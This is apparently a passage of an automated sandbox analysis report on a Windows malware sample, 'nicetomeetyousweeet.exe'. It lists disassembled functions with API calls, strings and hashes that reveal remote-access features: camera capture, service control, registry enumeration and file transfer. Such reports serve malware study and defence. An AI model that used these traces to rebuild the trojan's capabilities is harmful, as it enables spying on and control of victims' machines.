                                                                                • Instruction Fuzzy Hash: 1551E632900205FBDB25AB688C59FEE77A9EF89730F25411DF815A6192EB3DDD00C664
                                                                                Function 007C51A4 Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Info
                                                                                • String ID:
                                                                                • API String ID: 2509303402-0
                                                                                • Opcode ID: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                                                • Instruction ID: ee2cb72564e267909161a0acc8974f26539ab11b0454d236e1d1e0f9eb9ced59
                                                                                • Opcode Fuzzy Hash: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                                                • Instruction Fuzzy Hash: 5E5141B0A00705AEDB109F65C885FEEBBF9FF48301F44442DF599B6241D77AA9818B21
                                                                                Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 3509577899-3206640213
                                                                                • Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                                                                                • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                • Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                                                                                • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologSleep
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                • API String ID: 3469354165-462540288
                                                                                • Opcode ID: da46002fc2985b2ef131603759b010d57e67311458491ebb77e3f1f5b4e35114
                                                                                • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                • Opcode Fuzzy Hash: da46002fc2985b2ef131603759b010d57e67311458491ebb77e3f1f5b4e35114
                                                                                • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                Function 0078404E Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 007840F1
                                                                                  • Part of subcall function 00784234: __EH_prolog.LIBCMT ref: 00784239
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologSleep
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                • API String ID: 3469354165-462540288
                                                                                • Opcode ID: 37a605f6fc1509c022d5344fe3f73bddb8cf724610274ffecc6b5ec626bfb4aa
                                                                                • Instruction ID: 56076acc1610f40a33660a61bdb7a48abf30d1870d77c53830212e90b116a7cc
                                                                                • Opcode Fuzzy Hash: 37a605f6fc1509c022d5344fe3f73bddb8cf724610274ffecc6b5ec626bfb4aa
                                                                                • Instruction Fuzzy Hash: 1041D430E88201DBCB14FB78D81E66D37A6AB41340F004529F909876E6EF7C9E46C786
                                                                                Function 00786E50 Relevance: 9.1, APIs: 6, Instructions: 97fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00786E9F
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0), ref: 00786EE7
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00786F27
                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00786F44
                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008), ref: 00786F6F
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00786F7F
                                                                                  • Part of subcall function 007847C2: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00784875,00000000,?,?), ref: 007847D1
                                                                                  • Part of subcall function 007847C2: SetEvent.KERNEL32(?,?,?,00784875,00000000,?,?), ref: 007847EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                • String ID:
                                                                                • API String ID: 1303771098-0
                                                                                • Opcode ID: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                                                • Instruction ID: 5502fee0509eff0742da7ccc6328fc8dc46a9e8844f7fda019e53f43a3597c09
                                                                                • Opcode Fuzzy Hash: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                                                • Instruction Fuzzy Hash: 1A31A471548305EFC610FF20DD49DAFB7A8FB84711F40492DF98592152EB789A48CB56
                                                                                Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                • String ID:
                                                                                • API String ID: 493672254-0
                                                                                • Opcode ID: 9c52c2ac0f13bfd00a15fb34cb1c599d7e3f92645b87278aa81d0ee05283a4d7
                                                                                • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                • Opcode Fuzzy Hash: 9c52c2ac0f13bfd00a15fb34cb1c599d7e3f92645b87278aa81d0ee05283a4d7
                                                                                • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                Function 00799EEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 00799EFB
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 00799F12
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00799F1F
                                                                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00799F2E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$Open$CloseControlHandleManager
                                                                                • String ID:
                                                                                • API String ID: 1243734080-0
                                                                                • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                • Instruction ID: f623557bf220e2e7f4327ddbc0ab6b28b8008fc9a53d5e71cebe206ee94aa562
                                                                                • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                • Instruction Fuzzy Hash: A811C632545218AFEB116B64EC89DFF3BACDB45BA2B000039F602D21C2DB64CC06DAB0
                                                                                Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                Function 007B806D Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,007B8064,007B7A18), ref: 007B807B
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007B8089
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007B80A2
                                                                                • SetLastError.KERNEL32(00000000,?,007B8064,007B7A18), ref: 007B80F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                • Instruction ID: 6397aad39f6dbc003042d40d3a5c649a00b325416f78ac9f522f63568385a942
                                                                                • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                • Instruction Fuzzy Hash: 2A01B13251A316EEE6643678BC8DBE7264CEB017B5B20023AF728851E1EE194844E246
                                                                                Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • _free.LIBCMT ref: 00446EF6
                                                                                • _free.LIBCMT ref: 00446F1E
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • _abort.LIBCMT ref: 00446F3D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                Function 007C7126 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                • _free.LIBCMT ref: 007C715D
                                                                                • _free.LIBCMT ref: 007C7185
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C7192
                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                • _abort.LIBCMT ref: 007C71A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction ID: c2e4657df95ca004b783a51642d17386ba40c0aa29abe5ddf15a18ef02bc4199
                                                                                • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                • Instruction Fuzzy Hash: E8F0A93524C714A7C65A23347C4FF2F2766DBC17A2F28012CF558D6191EF2D8C42C915
                                                                                Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: c693f0bc68fef192fd8e3cc27c6266fde5d6bb81be54592a093b1dffb845cd77
                                                                                • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                • Opcode Fuzzy Hash: c693f0bc68fef192fd8e3cc27c6266fde5d6bb81be54592a093b1dffb845cd77
                                                                                • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 23c436ef8f68778fffd06b1cb2ac843769c73bea320e54bed0ee7a0f63c6b0f5
                                                                                • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                • Opcode Fuzzy Hash: 23c436ef8f68778fffd06b1cb2ac843769c73bea320e54bed0ee7a0f63c6b0f5
                                                                                • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 08e91ba94b6aa68f46c9b0408f5ff7d04a74b604ebddb06d2a7ddc98e94a4f98
                                                                                • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                • Opcode Fuzzy Hash: 08e91ba94b6aa68f46c9b0408f5ff7d04a74b604ebddb06d2a7ddc98e94a4f98
                                                                                • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$InfoQueryValue
                                                                                • String ID: [regsplt]$DG
                                                                                • API String ID: 3554306468-1089238109
                                                                                • Opcode ID: c7257a80ca0406e2e64fcff0ff55628a337409a0c8b42eebab18550c86fe5037
                                                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                • Opcode Fuzzy Hash: c7257a80ca0406e2e64fcff0ff55628a337409a0c8b42eebab18550c86fe5037
                                                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                Function 0078C8D4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00791900: TerminateProcess.KERNEL32(00000000,?,0078C8E4), ref: 00791910
                                                                                  • Part of subcall function 00791900: WaitForSingleObject.KERNEL32(000000FF,?,0078C8E4), ref: 00791923
                                                                                  • Part of subcall function 007928C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 007928E0
                                                                                  • Part of subcall function 007928C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 007928F9
                                                                                  • Part of subcall function 007928C4: RegCloseKey.ADVAPI32(?), ref: 00792904
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0078C92E
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0078CA8D
                                                                                • ExitProcess.KERNEL32 ref: 0078CA99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                • String ID: @CG$exepath
                                                                                • API String ID: 1913171305-1253070338
                                                                                • Opcode ID: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                                                • Instruction ID: 2e0e5bca530a04888f282ebfae55573a7e355b8783f1925ff9fdd176e47777eb
                                                                                • Opcode Fuzzy Hash: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                                                • Instruction Fuzzy Hash: 40418532A84118DACB14FB64DC5AEFE7779AF50701F500169F406A3193EF285E47CB95
                                                                                Function 007C293B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000104), ref: 007C297B
                                                                                • _free.LIBCMT ref: 007C2A46
                                                                                • _free.LIBCMT ref: 007C2A50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: (7h$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                                                                                • API String ID: 2506810119-1637841345
                                                                                • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                • Instruction ID: 4a27e7c5fba48d0a6164d6715161bf2f974f4d3a9223ceafbaa9df110ea07ea7
                                                                                • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                • Instruction Fuzzy Hash: 2D316671A01618EFCB21DF599C85F9EBBFCEB45310F10406EE905A7212D6745E42C750
                                                                                Function 0079409E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 007940ED
                                                                                • LoadLibraryA.KERNEL32(?), ref: 0079412F
                                                                                • LoadLibraryA.KERNEL32(?), ref: 0079418E
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007941B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystem
                                                                                • String ID: g<A
                                                                                • API String ID: 4217395396-3237022798
                                                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction ID: c753012073186ebc303f2dde2abe404ff5bed351bfb4f218941d96f4a18e670e
